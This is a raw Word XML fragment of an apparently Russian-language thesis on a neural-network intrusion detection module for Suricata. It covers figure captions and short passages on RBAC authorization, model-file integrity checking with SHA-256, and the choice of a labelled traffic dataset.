        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5780C1D1" w14:textId="77777777" w:rsidR="00816679" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>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C60BE7" wp14:editId="1595795B">
            <wp:extent cx="6156960" cy="5506085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105940305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03054" name="Рисунок 1059403054"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6156960" cy="5506085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6505257C" w14:textId="28DF5F2D" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Диаграмма последовательности аутентификации пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117BF505" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7374AA"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A11701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для защиты доступа к критически важным функциям плагина выбрана многофакторная аутентификация в сочетании с ролевой моделью доступа. Применение данного подхода позволяет комплексно решить задачи предотвращения несанкционированного доступа, минимизации привилегий и аудита действий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F9245" w14:textId="36338C91" w:rsidR="008E0171" w:rsidRPr="00A11701" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>После успешной аутентификации система проверяет права доступа пользователя к запрашиваемым ресурсам. Процесс авторизации представлен на рисунке 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AB4C37" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="000A6D74" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:hanging="284"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EC03EE6" wp14:editId="6039EA0D">
            <wp:extent cx="6368882" cy="5400675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="425557328"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72725" cy="5403934"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4097AA3B" w14:textId="26DCA7E4" w:rsidR="008E0171" w:rsidRPr="00601CA8" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:hanging="284"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Диаграмма последовательности процесса авторизации и разграничения прав доступа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156A6184" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00601CA8" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:hanging="284"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2BD4C1" w14:textId="01984193" w:rsidR="008E0171" w:rsidRPr="00601CA8" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Диаграмма иллюстрирует процесс авторизации на основе ролевой модели (RBAC). После получения запроса от администратора модуль авторизации извлекает роль пользователя из JWT-токена и запрашивает у политики безопасности список разрешений для данной роли. На основании полученных данных принимается решение о разрешении или запрете запрошенной операции</w:t>
      </w:r>
      <w:r w:rsidR="00816679">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058DB4C0" w14:textId="74553EBA"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C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Для защиты от угрозы УБИ.221 (модификация модели машинного обучения) разработан механизм контроля целостности файлов модели и конфигурации. Процесс верификации целостности представлен на рисунке 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5833A7CB" w14:textId="77777777" w:rsidR="005C39E4" w:rsidRDefault="005C39E4" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285BEBEA" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C37E13" w:rsidRDefault="008E0171" w:rsidP="00816679">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28D4CF2A" wp14:editId="57631946">
            <wp:extent cx="6097970" cy="4923155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107564115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779" cy="4941570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69763264" w14:textId="127DA6EC" w:rsidR="008E0171" w:rsidRPr="00601CA8" w:rsidRDefault="008E0171" w:rsidP="00816679">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Диаграмма последовательности контроля целостности модели</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767823FB" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00601CA8" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:hanging="284"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501E4591" w14:textId="12FA3BBB" w:rsidR="00230C61" w:rsidRDefault="008E0171" w:rsidP="00230C61">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">На диаграмме показан процесс периодической проверки целостности файлов нейросетевой модели. Модуль контроля целостности считывает файл модели, вычисляет его хеш-сумму по алгоритму SHA-256 и запрашивает эталонное значение из защищённого хранилища. При совпадении </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A11701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хешей</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A11701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> результат фиксируется в журнале аудита как успешная проверка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498235E7" w14:textId="235AB46A" w:rsidR="00230C61" w:rsidRDefault="00230C61" w:rsidP="00230C61">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E4B5EA" w14:textId="225D5760" w:rsidR="006605C1" w:rsidRDefault="006605C1" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc230947685"/>
      <w:bookmarkStart w:id="18" w:name="_Toc231673288"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="006605C1">
        <w:t>Разработка и тестирование нейросетевого модуля</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="6C10167A" w14:textId="1C073D64" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc231673289"/>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005135C4">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005135C4">
        <w:t>Формирование и подготовка датасета</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="005135C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5B54A5" w14:textId="77777777" w:rsidR="006605C1" w:rsidRPr="005135C4" w:rsidRDefault="006605C1" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="403B2E8C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00997B0C" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395BED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Эффективность работы системы обнаружения вторжений на базе искусственных нейронных сетей напрямую зависит от качества и репрезентативности данных, используемых на этапах обучения и валидации модели. В соответствии с задачами, поставленными в разделе 1.2, разрабатываемый модуль должен обеспечивать детектирование актуальных угроз. Следовательно, формируемая выборка данных должна содержать достаточное количество примеров как легитимной сетевой активности, так и реализаций указанных классов атак.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39757DD0"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395BED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для обеспечения корректности экспериментов и возможности сравнения результатов с существующими аналогами, в рамках данного исследования принято решение использовать общедоступный специализированный набор данных сетевого трафика, разработанный профильным исследовательским институтом в области кибербезопасности. Выбор готового набора данных обусловлен необходимостью наличия размеченных примеров атак, воспроизводимости результатов и соответствия структуры данных возможностям системы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00395BED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00395BED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> по сбору метаданных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B685CF1"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660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Выбор готового набора данных обусловлен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>еобходимост</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ью</w:t>
      </w:r>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> размеченных данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и с</w:t>
      </w:r>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>оответствие архитектуре модуля</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">труктура данных должна быть совместима с возможностями системы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> по сбору метаданных потоков</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>описанными в разделе 2.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC2753A" w14:textId="5DE581D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w:t>
      </w:r>
      <w:r w:rsidRPr="00F212D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сновны</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00F212D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> требования, предъявляемы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00F212D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> к датасету в контексте данной работы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> показаны в таблице 1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4817E64C"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72FA73AF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="006605C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
